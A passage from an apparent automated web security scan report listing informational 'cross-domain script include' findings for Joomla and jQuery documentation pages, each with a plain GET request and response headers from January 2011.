<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.156. http://docs.joomla.org/Help_screens previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Help_screens

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Help_screens HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 19 Sep 2010 13:11:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.157. http://docs.joomla.org/Joomla!_Extension_Directory_FAQs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Joomla!_Extension_Directory_FAQs

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Joomla!_Extension_Directory_FAQs HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Mon, 20 Sep 2010 18:01:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.158. http://docs.joomla.org/Joomla_Administrators_Security_Checklist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Joomla_Administrators_Security_Checklist

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Joomla_Administrators_Security_Checklist HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.159. http://docs.joomla.org/Migrating_from_1.0.x_to_1.5_Stable previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Migrating_from_1.0.x_to_1.5_Stable

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Migrating_from_1.0.x_to_1.5_Stable HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Tue, 18 Jan 2011 16:27:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.160. http://docs.joomla.org/Portal:Bug_Squad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Portal:Bug_Squad

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Portal:Bug_Squad HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Thu, 16 Sep 2010 21:13:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.161. http://docs.joomla.org/Start_here previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Start_here

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Start_here HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.162. http://docs.joomla.org/Template previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Template

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 15:04:37 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.163. http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Tutorial:Creating_a_basic_Joomla!_template

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Tutorial:Creating_a_basic_Joomla!_template HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Content-language: en
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-Modified: Sun, 16 Jan 2011 13:42:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.164. http://docs.joomla.org/Upgrading_1.5_from_an_existing_1.5x_version previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Upgrading_1.5_from_an_existing_1.5x_version

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Upgrading_1.5_from_an_existing_1.5x_version HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sun, 13 Jun 2010 18:50:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.165. http://docs.joomla.org/Web_designers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Web_designers

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Web_designers HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Sat, 15 Jan 2011 16:34:06 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.166. http://docs.joomla.org/Working_Groups previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/Working_Groups

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

GET /Working_Groups HTTP/1.1
Host: docs.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:05:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding,Cookie
X-Vary-Options: Accept-Encoding;list-contains=gzip,Cookie;string-contains=docsj_mediawikiToken;string-contains=docsj_mediawikiLoggedOut;string-contains=docsj_mediawiki_session
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Content-language: en
Last-Modified: Fri, 14 Jan 2011 10:07:35 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

...[SNIP]...
</style>
<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.167. http://docs.joomla.org/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.joomla.org
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://partner.googleadservices.com/gampad/google_service.js

Request

Response

21.168. http://docs.jquery.com/UI previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:33:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 15:56:34 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.169. http://docs.jquery.com/UI/Dialog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Dialog

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Dialog HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:52 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Fri, 10 Dec 2010 17:56:02 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.170. http://docs.jquery.com/UI/Draggables previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Draggables

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Draggables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:13 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.171. http://docs.jquery.com/UI/Droppables previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Droppables

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Droppables HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:21 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.172. http://docs.jquery.com/UI/Effects/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/ HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:00 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.173. http://docs.jquery.com/UI/Effects/Blind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Blind

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Blind HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:00 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.174. http://docs.jquery.com/UI/Effects/Bounce previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Bounce

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Bounce HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.175. http://docs.jquery.com/UI/Effects/Clip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Clip

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Clip HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:02 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.176. http://docs.jquery.com/UI/Effects/Drop previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Drop

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Drop HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.177. http://docs.jquery.com/UI/Effects/Explode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://docs.jquery.com
Path:	/UI/Effects/Explode

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET /UI/Effects/Explode HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:32:05 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Wed, 25 Aug 2010 13:24:58 GMT
Content-language: en
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<![endif]-->

